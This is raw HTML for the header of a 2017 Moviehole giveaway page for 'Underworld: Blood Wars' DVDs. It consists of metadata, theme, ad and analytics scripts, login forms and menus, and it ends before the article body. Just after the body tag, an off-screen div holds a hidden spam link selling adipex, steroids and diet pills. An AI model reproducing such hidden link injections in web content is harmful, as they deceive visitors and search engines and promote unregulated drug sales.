<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]-->
<head>
    <title>Underworld: Blood Wars - Moviehole</title>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="http://moviehole.net/xmlrpc.php" />
    <meta property="og:image" content="http://moviehole.net/img/underworld-1.jpg" /><meta name="author" content="Ash">
<link rel="icon" type="image/png" href="http://moviehole.net/img/favicon.png">
<!-- This site is optimized with the Yoast SEO plugin v4.2 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://moviehole.net/2017112907underworld-blood-wars" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Underworld: Blood Wars - Moviehole" />
<meta property="og:description" content="To celebrate the release of &#8220;Underworld: Blood Wars&#8221;, out on Blu-Ray and DVD March 22, Moviehole has 10 DVD copies of the film to giveaway! In the next instalment of the blockbuster franchise, we follow Vampire death dealer, Selene (Kate Beckinsale) as she fends off brutal attacks from both the Lycan clan and the Vampire faction that &hellip;" />
<meta property="og:url" content="http://moviehole.net/2017112907underworld-blood-wars" />
<meta property="og:site_name" content="Moviehole" />
<meta property="article:tag" content="Underworld : Blood Wars" />
<meta property="article:section" content="Giveaways" />
<meta property="article:published_time" content="2017-03-20T01:12:17+00:00" />
<meta property="article:modified_time" content="2017-02-27T02:28:08+00:00" />
<meta property="og:updated_time" content="2017-02-27T02:28:08+00:00" />
<meta property="og:image" content="http://moviehole.net/img/underworld-1.jpg" />
<meta property="og:image:width" content="1350" />
<meta property="og:image:height" content="900" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="To celebrate the release of &#8220;Underworld: Blood Wars&#8221;, out on Blu-Ray and DVD March 22, Moviehole has 10 DVD copies of the film to giveaway! In the next instalment of the blockbuster franchise, we follow Vampire death dealer, Selene (Kate Beckinsale) as she fends off brutal attacks from both the Lycan clan and the Vampire faction that [&hellip;]" />
<meta name="twitter:title" content="Underworld: Blood Wars - Moviehole" />
<meta name="twitter:image" content="http://moviehole.net/img/underworld-1.jpg" />
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Moviehole &raquo; Feed" href="http://moviehole.net/feed" />
<link rel="alternate" type="application/rss+xml" title="Moviehole &raquo; Comments Feed" href="http://moviehole.net/comments/feed" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/moviehole.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.3"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='mmm_mega_main_menu-css'  href='http://moviehole.net/wp-content/plugins/mega_main_menu/src/css/cache.skin.css?ver=1431223570' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='http://moviehole.net/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='google_font_open_sans-css'  href='http://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C400%2C600%2C700&#038;ver=4.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='google_font_roboto-css'  href='http://fonts.googleapis.com/css?family=Roboto%3A500%2C400italic%2C700%2C900%2C500italic%2C400%2C300&#038;ver=4.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='google-fonts-style-css'  href='http://fonts.googleapis.com/css?family=Abril+Fatface%3A400%2C700%7CLato%3A400%2C700&#038;ver=4.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='mm_icomoon-css'  href='http://moviehole.net/wp-content/plugins/mega_main_menu/src/css/external/icomoon.css?ver=2.0.2' type='text/css' media='all' />
<link rel='stylesheet' id='mm_font-awesome-css'  href='http://moviehole.net/wp-content/plugins/mega_main_menu/src/css/external/font-awesome.css?ver=2.0.2' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css'  href='http://moviehole.net/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.11.2' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='http://moviehole.net/wp-content/themes/Newspaper/style.css?ver=7.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-demo-style-css'  href='http://moviehole.net/wp-content/themes/Newspaper/includes/demos/medicine/demo_style.css?ver=7.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='http://moviehole.net/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://moviehole.net/wp-content/plugins/jetpack/css/jetpack.css?ver=4.5' type='text/css' media='all' />
<script type='text/javascript' src='http://moviehole.net/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://moviehole.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://moviehole.net/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.5.0'></script>
<link rel='https://api.w.org/' href='http://moviehole.net/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://moviehole.net/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://moviehole.net/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.7.3" />
<link rel='shortlink' href='http://moviehole.net/?p=112907' />
<link rel="alternate" type="application/json+oembed" href="http://moviehole.net/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fmoviehole.net%2F2017112907underworld-blood-wars" />
<link rel="alternate" type="text/xml+oembed" href="http://moviehole.net/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fmoviehole.net%2F2017112907underworld-blood-wars&#038;format=xml" />
<script data-cfasync="false" src="//load.sumome.com/" data-sumo-platform="wordpress" data-sumo-site-id="5aacdef5bfddd5beb83b7a5d7767791b7b2cc57ddd1dfd5a7a69de0d5030e03e" async></script><script type="text/javascript">
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i < evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i < evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//moviehole.net/?wordfence_logHuman=1&hid=1DAC821FE7D9E7C119AB72EE96D7E1D5');
</script><style type='text/css'>img#wpstats{display:none}</style><!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://moviehole.net/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE  8]><link rel="stylesheet" type="text/css" href="http://moviehole.net/wp-content/plugins/js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]-->
<!-- JS generated by theme -->

<script>
    
    

	    var tdBlocksArray = []; //here we store all the items for the current page

	    //td_block class - each ajax block uses a object of this class for requests
	    function tdBlock() {
		    this.id = '';
		    this.block_type = 1; //block type id (1-234 etc)
		    this.atts = '';
		    this.td_column_number = '';
		    this.td_current_page = 1; //
		    this.post_count = 0; //from wp
		    this.found_posts = 0; //from wp
		    this.max_num_pages = 0; //from wp
		    this.td_filter_value = ''; //current live filter value
		    this.is_ajax_running = false;
		    this.td_user_action = ''; // load more or infinite loader (used by the animation)
		    this.header_color = '';
		    this.ajax_pagination_infinite_stop = ''; //show load more at page x
	    }


        // td_js_generator - mini detector
        (function(){
            var htmlTag = document.getElementsByTagName("html")[0];

            if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
                htmlTag.className += ' ie10';
            }

            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
                htmlTag.className += ' ie11';
            }

            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
                htmlTag.className += ' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if ( user_agent.indexOf("android") > -1 ) {
                htmlTag.className += ' td-md-is-android';
            }

            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
                htmlTag.className += ' td-md-is-os-x';
            }

            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
               htmlTag.className += ' td-md-is-chrome';
            }

            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
                htmlTag.className += ' td-md-is-firefox';
            }

            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
                htmlTag.className += ' td-md-is-safari';
            }

        })();




        var tdLocalCache = {};

        ( function () {
            "use strict";

            tdLocalCache = {
                data: {},
                remove: function (resource_id) {
                    delete tdLocalCache.data[resource_id];
                },
                exist: function (resource_id) {
                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
                },
                get: function (resource_id) {
                    return tdLocalCache.data[resource_id];
                },
                set: function (resource_id, cachedData) {
                    tdLocalCache.remove(resource_id);
                    tdLocalCache.data[resource_id] = cachedData;
                }
            };
        })();

    
    
var tds_login_sing_in_widget="show";
var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":324}];
var td_animation_stack_effect="type0";
var tds_animation_stack=true;
var td_animation_stack_specific_selectors=".entry-thumb, img";
var td_animation_stack_general_selectors=".td-animation-stack img, .post img";
var td_ajax_url="http:\/\/moviehole.net\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=7.0.1";
var td_get_template_directory_uri="http:\/\/moviehole.net\/wp-content\/themes\/Newspaper";
var tds_snap_menu="";
var tds_logo_on_sticky="show";
var tds_header_style="3";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_theme_color_site_wide="#376a91";
var tds_smart_sidebar="enabled";
var tdThemeName="Newspaper";
var td_magnific_popup_translation_tPrev="Previous (Left arrow key)";
var td_magnific_popup_translation_tNext="Next (Right arrow key)";
var td_magnific_popup_translation_tCounter="%curr% of %total%";
var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded.";
var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded.";
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>


<!-- Header style compiled by theme -->

<style>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</style>


<!--[if gte IE 9]>
	<style type="text/css">
		.#mega_main_menu,
		.#mega_main_menu *
		{
			filter: none;
		}
	</style>
<![endif]-->
<link rel="icon" href="http://moviehole.net/img/cropped-MH-LOGO-2016-32x32.png" sizes="32x32" />
<link rel="icon" href="http://moviehole.net/img/cropped-MH-LOGO-2016-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="http://moviehole.net/img/cropped-MH-LOGO-2016-180x180.png" />
<meta name="msapplication-TileImage" content="http://moviehole.net/img/cropped-MH-LOGO-2016-270x270.png" />
<!-- Google Analytics Tracking by Google Analyticator 6.5.0: http://www.videousermanuals.com/google-analyticator/ -->
<script type="text/javascript">
    var analyticsFileTypes = [''];
    var analyticsSnippet = 'disabled';
    var analyticsEventTracking = 'enabled';
</script>
<script type="text/javascript">
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
	ga('create', 'UA-18198727-1', 'auto');
 
	ga('send', 'pageview');
</script>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><script type="text/javascript">
// Add Global Lightbox Settings for VC Extensions
var $TS_VCSC_Lightbox_Thumbs = "bottom";
var $TS_VCSC_Lightbox_Thumbsize = 50;
var $TS_VCSC_Lightbox_Animation = "random";
var $TS_VCSC_Lightbox_Captions = "data-title";
var $TS_VCSC_Lightbox_Durations = 5000;
var $TS_VCSC_Lightbox_Share = true;
var $TS_VCSC_Lightbox_Social = "fb,tw,gp,pin";
var $TS_VCSC_Lightbox_NoTouch = false;
var $TS_VCSC_Lightbox_BGClose = true;
var $TS_VCSC_Lightbox_NoHashes = true;
var $TS_VCSC_Lightbox_Keyboard = true;
var $TS_VCSC_Lightbox_FullScreen = true;
var $TS_VCSC_Lightbox_Zoom = true;
var $TS_VCSC_Lightbox_FXSpeed = 300;
var $TS_VCSC_Lightbox_Scheme = "dark";
var $TS_VCSC_Lightbox_Backlight = "#ffffff";
var $TS_VCSC_Lightbox_UseColor = false;
</script>
</head>

<body class="post-template-default single single-post postid-112907 single-format-standard mmm mega_main_menu-2-0-2 underworld-blood-wars td-medicine wpb-js-composer js-comp-ver-4.11.2 vc_responsive td-animation-stack-type0 td-boxed-layout" itemscope="itemscope" itemtype="http://schema.org/WebPage"><div style="position: absolute; bottom: 0px; left: -1101px;">Legally site to buy steroids and diet pills drugs <a title="buy adipex Online" href="https://buyadipexnow.com/" target="_blank" hreflang="en-US" >buy adipex</a> in USA legal and CHEAP.</div>

        <div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>
    
    <div class="td-menu-background"></div>
<div id="td-mobile-nav">
    <div class="td-mobile-container">
        <!-- mobile menu top section -->
        <div class="td-menu-socials-wrap">
            <!-- socials -->
            <div class="td-menu-socials">
                
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.facebook.com/moviehole" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="moviehole" title="Google+">
                <i class="td-icon-font td-icon-googleplus"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://instagram.com/moviehole" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://http//WWW.pinterest.com/moviehole" title="Pinterest">
                <i class="td-icon-font td-icon-pinterest"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.twitter.com/moviehole" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>            </div>
            <!-- close button -->
            <div class="td-mobile-close">
                <a href="#"><i class="td-icon-close-mobile"></i></a>
            </div>
        </div>

        <!-- login section -->
                    <div class="td-menu-login-section">
                
    <div class="td-guest-wrap">
        <div class="td-menu-avatar"><div class="td-avatar-container"><img alt='' src='http://2.gravatar.com/avatar/?s=80&#038;d=mm&#038;r=g' srcset='http://2.gravatar.com/avatar/?s=160&amp;d=mm&amp;r=g 2x' class='avatar avatar-80 photo avatar-default' height='80' width='80' /></div></div>
        <div class="td-menu-login"><a id="login-link-mob">Sign in</a></div>
    </div>
            </div>
        
        <!-- menu section -->
        <div class="td-mobile-content">
            <div class="menu-movieholemain-container"><ul id="menu-movieholemain" class="td-mobile-main-menu"><li id="menu-item-100131" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first menu-item-100131"><a href="http://moviehole.net/">Home</a></li>
<li id="menu-item-58984" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-58984"><a title="News" href="http://moviehole.net/category/news">News</a></li>
<li id="menu-item-71596" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-71596"><a href="http://moviehole.net/category/tv-2">TV<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-83539" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-83539"><a href="http://moviehole.net/category/streamingtv">Streaming</a></li>
</ul>
</li>
<li id="menu-item-71477" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-71477"><a href="http://moviehole.net/category/cinema">Cinema Reviews</a></li>
<li id="menu-item-58987" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-58987"><a href="http://moviehole.net/category/interviews">Interviews<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-54938" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-54938"><a href="http://moviehole.net/category/a-mandy-moment">Mandy</a></li>
</ul>
</li>
<li id="menu-item-70405" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-70405"><a href="http://moviehole.net/category/movie-trailers">Trailers</a></li>
<li id="menu-item-71478" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-71478"><a href="http://moviehole.net/category/disc">VOD/DVD</a></li>
<li id="menu-item-54590" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-54590"><a href="http://moviehole.net/category/giveaways">Giveaways</a></li>
<li id="menu-item-74081" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-74081"><a href="http://moviehole.net/tag/vod">VOD Views</a></li>
</ul></div>        </div>
    </div>

    <!-- register/login section -->
            <div id="login-form-mobile" class="td-register-section">
            
            <div id="td-login-mob" class="td-login-animation td-login-hide-mob">
            	<!-- close button -->
	            <div class="td-login-close">
	                <a href="#" class="td-back-button"><i class="td-icon-read-down"></i></a>
	                <div class="td-login-title">Sign in</div>
	                <!-- close button -->
		            <div class="td-mobile-close">
		                <a href="#"><i class="td-icon-close-mobile"></i></a>
		            </div>
	            </div>
	            <div class="td-login-form-wrap">
	                <div class="td-login-panel-title"><span>Welcome!</span>Log into your account</div>
	                <div class="td_display_err"></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="text" name="login_email" id="login_email-mob" value="" required><label>your username</label></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="password" name="login_pass" id="login_pass-mob" value="" required><label>your password</label></div>
	                <input type="button" name="login_button" id="login_button-mob" class="td-login-button" value="LOG IN">
	                <div class="td-login-info-text"><a href="#" id="forgot-pass-link-mob">Forgot your password?</a></div>
                </div>
            </div>

            

            <div id="td-forgot-pass-mob" class="td-login-animation td-login-hide-mob">
                <!-- close button -->
	            <div class="td-forgot-pass-close">
	                <a href="#" class="td-back-button"><i class="td-icon-read-down"></i></a>
	                <div class="td-login-title">Password recovery</div>
	            </div>
	            <div class="td-login-form-wrap">
	                <div class="td-login-panel-title">Recover your password</div>
	                <div class="td_display_err"></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="text" name="forgot_email" id="forgot_email-mob" value="" required><label>your email</label></div>
	                <input type="button" name="forgot_button" id="forgot_button-mob" class="td-login-button" value="Send My Pass">
                </div>
            </div>
        </div>
    </div>    <div class="td-search-background"></div>
<div class="td-search-wrap-mob">
	<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
		<form method="get" class="td-search-form" action="http://moviehole.net/">
			<!-- close button -->
			<div class="td-search-close">
				<a href="#"><i class="td-icon-close-mobile"></i></a>
			</div>
			<div role="search" class="td-search-input">
				<span>Search</span>
				<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
			</div>
		</form>
		<div id="td-aj-search-mob"></div>
	</div>
</div>    
    
    <div id="td-outer-wrap">
    
        <!--
Header style 3
-->

<div class="td-header-wrap td-header-style-3">

    <div class="td-header-top-menu-full">
        <div class="td-container td-header-row td-header-top-menu">
            
    <div class="top-bar-style-1">
        
<div class="td-header-sp-top-menu">


	        <div class="td_data_time">
            <div >

                Monday, March 20, 2017
            </div>
        </div>
    <ul class="top-header-menu td_ul_login"><li class="menu-item"><a class="td-login-modal-js menu-item" href="#login-form" data-effect="mpf-td-login-effect">Sign in / Join</a><span class="td-sp-ico-login td_sp_login_ico_style"></span></li></ul><div class="menu-top-container"><ul id="menu-top-menu" class="top-header-menu"><li id="menu-item-97172" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-97172"><a href="http://moviehole.net/td_d_slug_15">Contact us</a></li>
</ul></div></div>
        <div class="td-header-sp-top-widget">
    
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.facebook.com/moviehole" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="moviehole" title="Google+">
                <i class="td-icon-font td-icon-googleplus"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://instagram.com/moviehole" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://http//WWW.pinterest.com/moviehole" title="Pinterest">
                <i class="td-icon-font td-icon-pinterest"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.twitter.com/moviehole" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span></div>
    </div>

<!-- LOGIN MODAL -->

                <div  id="login-form" class="white-popup-block mfp-hide mfp-with-anim">
                    <ul class="td-login-tabs">
                        <li><a id="login-link" class="td_login_tab_focus">LOG IN</a></li>
                    </ul>



                    <div class="td-login-wrap">
                        <div class="td_display_err"></div>

                        <div id="td-login-div" class="">
                            <div class="td-login-panel-title">Welcome! Log into your account</div>
                            <input class="td-login-input" type="text" name="login_email" id="login_email" placeholder="your username" value="" required>
                            <input class="td-login-input" type="password" name="login_pass" id="login_pass" value="" placeholder="your password" required>
                            <input type="button" name="login_button" id="login_button" class="wpb_button btn td-login-button" value="Log In">


                            <div class="td-login-info-text"><a href="#" id="forgot-pass-link">Forgot your password?</a></div>


                        </div>

                        

                         <div id="td-forgot-pass-div" class="td-display-none">
                            <div class="td-login-panel-title">Recover your password</div>
                            <input class="td-login-input" type="text" name="forgot_email" id="forgot_email" placeholder="your email" value="" required>
                            <input type="button" name="forgot_button" id="forgot_button" class="wpb_button btn td-login-button" value="Send My Pass">
                        </div>




                    </div>
                </div>
                        </div>
    </div>

    <div class="td-banner-wrap-full">
        <div class="td-container td-header-row td-header-header">
            <div class="td-header-sp-logo">
                            <a class="td-main-logo" href="http://moviehole.net/">
                <img src="http://moviehole.net/img/logomoviehole-700x295.png" alt=""/>
                <span class="td-visual-hidden">Moviehole</span>
            </a>
                    </div>
            <div class="td-header-sp-recs">
                <div class="td-header-rec-wrap">
    
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-header">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="2150934400"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="2150934400"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="2150934400"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 


</div>            </div>
        </div>
    </div>

    <div class="td-header-menu-wrap-full">
        <div class="td-header-menu-wrap">
            <div class="td-container td-header-row td-header-main-menu black-menu">
                <div id="td-header-menu" role="navigation">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo td-logo-in-header">
        		<a class="td-mobile-logo td-sticky-mobile" href="http://moviehole.net/">
			<img class="td-retina-data" data-retina="http://moviehole.net/img/cropsmall.png" src="http://moviehole.net/img/cropsmall.png" alt=""/>
		</a>
			<a class="td-header-logo td-sticky-mobile" href="http://moviehole.net/">
			<img src="http://moviehole.net/img/logomoviehole-700x295.png" alt=""/>
		</a>
	    </div>
    <div class="menu-movieholemain-container"><ul id="menu-movieholemain-1" class="sf-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-100131"><a href="http://moviehole.net/">Home</a></li>
<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-58984"><a title="News" href="http://moviehole.net/category/news">News</a></li>
<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-71596"><a href="http://moviehole.net/category/tv-2">TV</a>
<ul class="sub-menu">
	<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-83539"><a href="http://moviehole.net/category/streamingtv">Streaming</a></li>
</ul>
</li>
<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-71477"><a href="http://moviehole.net/category/cinema">Cinema Reviews</a></li>
<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-58987"><a href="http://moviehole.net/category/interviews">Interviews</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-54938"><a href="http://moviehole.net/category/a-mandy-moment">Mandy</a></li>
</ul>
</li>
<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-70405"><a href="http://moviehole.net/category/movie-trailers">Trailers</a></li>
<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-71478"><a href="http://moviehole.net/category/disc">VOD/DVD</a></li>
<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-54590"><a href="http://moviehole.net/category/giveaways">Giveaways</a></li>
